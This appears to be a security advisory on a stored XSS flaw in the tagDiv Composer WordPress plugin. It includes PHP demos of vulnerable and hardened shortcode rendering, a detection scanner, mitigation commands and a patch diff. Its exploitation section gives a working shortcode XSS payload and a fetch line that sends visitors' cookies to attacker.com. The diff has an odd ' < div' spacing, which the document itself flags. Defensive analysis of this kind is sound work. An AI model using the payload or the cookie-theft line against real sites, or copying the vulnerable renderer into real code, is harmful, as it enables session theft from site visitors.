How CVE-2025-3510 Works
The tagDiv Composer plugin (≤ v5.4) for WordPress fails to sanitize user-supplied attributes in multiple shortcodes. Authenticated attackers with contributor-level access or higher can inject malicious JavaScript via crafted shortcode attributes. When a victim visits a page containing the poisoned shortcode, the payload executes in their browser, enabling session hijacking, defacement, or malware delivery. The vulnerability stems from improper output escaping when rendering shortcode attributes in frontend HTML.
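The escaping failure described above, as an added example (this is not tagDiv Composer's code): a minimal shortcode renderer that reflects every supplied attribute into the tag, beside a hardened version that whitelists attribute names with shortcode_atts() and escapes each value with esc_attr(). Both helpers are WordPress core functions; the simplified stand-ins defined here are an assumption so the script also runs from the command line outside WordPress.

```php
<?php
// Added example, not tagDiv Composer's code. Outside WordPress the two
// core helpers are replaced by simplified stand-ins (an assumption made
// here so the script runs from the CLI); inside WordPress the real
// esc_attr() and shortcode_atts() are used instead.
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('shortcode_atts')) {
    // Keeps only the keys declared in $pairs; any other attribute is dropped.
    function shortcode_atts(array $pairs, array $atts): array {
        $out = [];
        foreach ($pairs as $name => $default) {
            $out[$name] = array_key_exists($name, $atts) ? $atts[$name] : $default;
        }
        return $out;
    }
}

// Vulnerable pattern: every attribute the author typed is reflected into
// the tag unchanged, so onmouseover="..." becomes a live event handler and
// a quote inside a value breaks out of the attribute.
function render_vulnerable(array $atts): string
{
    $html = '<div';
    foreach ($atts as $name => $value) {
        $html .= ' ' . $name . '="' . $value . '"';
    }
    return $html . '></div>';
}

// Hardened pattern: only the attribute names the shortcode actually
// defines survive shortcode_atts(), and each value is escaped for the
// attribute context, so neither the extra attribute nor the embedded
// quote reaches the page as markup.
function render_hardened(array $atts): string
{
    $atts = shortcode_atts(['class' => '', 'title' => ''], $atts);
    return sprintf(
        '<div class="%s" title="%s"></div>',
        esc_attr($atts['class']),
        esc_attr($atts['title'])
    );
}

// Constructed input shaped like the advisory's shortcode: one attribute
// the shortcode never defined, one value carrying a quote.
$atts = [
    'class'       => 'intro" onfocus="alert(1)',
    'onmouseover' => 'alert(document.cookie)',
];
echo render_vulnerable($atts), PHP_EOL;
echo render_hardened($atts), PHP_EOL;
```

The vulnerable output carries a working onmouseover and a second injected onfocus handler; the hardened output is a single div whose class value contains `&quot;` entities and no event attributes at all. The point is that escaping alone is not enough when attribute names are attacker-chosen: the whitelist step removes the unknown name before escaping even applies.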
DailyCVE Form
Platform: WordPress
Version: ≤5.4
Vulnerability: Stored XSS
Severity: Critical
Date: 2025-05-06
What Undercode Say:
Exploitation
1. Payload Injection:
[td_shortcode onmouseover="alert(document.cookie)" class="malicious"]
2. Cookie Theft:
fetch('https://attacker.com/steal?data='+btoa(document.cookie));
Detection
1. Plugin Version Check:
wp plugin list --name=tagdiv-composer --field=version
2. Code Audit:
grep -r "do_shortcode" /wp-content/plugins/tagdiv-composer/
Mitigation
1. Immediate Action:
wp plugin deactivate tagdiv-composer
2. Permanent Fix:
wp plugin update tagdiv-composer --version=5.5
WAF Rules
location ~ /wp-content/plugins/tagdiv-composer/ { deny all; }
Log Analysis
grep -i "td_shortcode" /var/log/nginx/access.log | grep -E "<script|onerror"
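The access-log grep above only sees what passed through the web server; the payload of a stored XSS lives in post_content. As an added example (not from the advisory or the plugin), a stand-alone PHP scan over exported post content that parses each shortcode's attributes and flags event-handler names or script-bearing values. The sample text is constructed (the `[button]` shortcode is hypothetical; `td_shortcode` is the name used in this advisory); in practice feed it the post_content column of wp_posts, drafts and revisions included.

```php
<?php
// Added example, not from the advisory or the plugin. Scans text for
// shortcodes whose attributes look like injected script: an attribute
// name beginning with "on" (event handler) or a value carrying
// "javascript:" or "<script". Returns one finding per suspicious attribute.
function find_suspicious_shortcodes(string $content): array
{
    $findings = [];
    // Match [name attrs]; closing tags such as [/caption] do not match
    // because "/" is not part of the name class.
    $tagRe = '/\[([a-zA-Z0-9_-]+)([^\]]*)\]/';
    if (!preg_match_all($tagRe, $content, $tags, PREG_SET_ORDER | PREG_OFFSET_CAPTURE)) {
        return $findings;
    }
    // name="value", name='value' or bare name=value
    $attrRe = '/([a-zA-Z_][\w-]*)\s*=\s*("[^"]*"|\'[^\']*\'|\S+)/';
    foreach ($tags as $tag) {
        $shortcode = $tag[1][0];
        $attrText  = $tag[2][0];
        $offset    = $tag[0][1];
        preg_match_all($attrRe, $attrText, $attrs, PREG_SET_ORDER);
        foreach ($attrs as $a) {
            $name  = strtolower($a[1]);
            $value = trim($a[2], "\"'");
            // Names starting with "on" are the event-handler family the
            // advisory describes; a benign name such as "only" would also
            // match, so review hits by hand.
            $handlerName = strncmp($name, 'on', 2) === 0;
            $scriptValue = stripos($value, 'javascript:') !== false
                        || stripos($value, '<script') !== false;
            if ($handlerName || $scriptValue) {
                $findings[] = [
                    'offset'    => $offset,
                    'shortcode' => $shortcode,
                    'attribute' => $name,
                    'value'     => $value,
                ];
            }
        }
    }
    return $findings;
}

// Constructed sample: two benign WordPress shortcodes, the advisory's
// shortcode, and a hypothetical [button] carrying a javascript: URL.
$sample = <<<'TXT'
[gallery ids="1,2,3"]
[td_shortcode onmouseover="alert(document.cookie)" class="malicious"]
[caption id="attachment_12" align="alignnone" width="300"]a photo[/caption]
[button url="javascript:alert(1)" label="Go"]
TXT;

foreach (find_suspicious_shortcodes($sample) as $f) {
    printf("offset %d: [%s] %s=\"%s\"\n",
        $f['offset'], $f['shortcode'], $f['attribute'], $f['value']);
}
```

On the sample this reports two findings (the onmouseover attribute on td_shortcode and the javascript: URL on the hypothetical button) and stays silent on the gallery and caption shortcodes. Because it works on stored content rather than request logs, it also catches payloads that were saved long before the plugin was updated.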
Patch Diff
- echo ' < div class="'.esc_attr($atts['class']).'">'; + echo ' < div class="'.sanitize_html_class($atts['class']).'">';
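Review bot: replacing esc_attr() with sanitize_html_class() on $atts['class'] tightens one known attribute's value (it strips everything except letters, digits, hyphen and underscore, which does close a quote breakout there), but it does not address the vector the advisory describes, where an attribute the shortcode never defined, such as onmouseover, is rendered at all; the fix should also whitelist the accepted attribute names, for example via shortcode_atts() with an explicit list of keys, so unexpected attributes are dropped before any echo. Separately, both lines emit ' < div class=' with a space after '<'; if that is not an extraction artefact the browser will render it as literal text rather than an element.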
References
Sources:
Reported By: nvd.nist.gov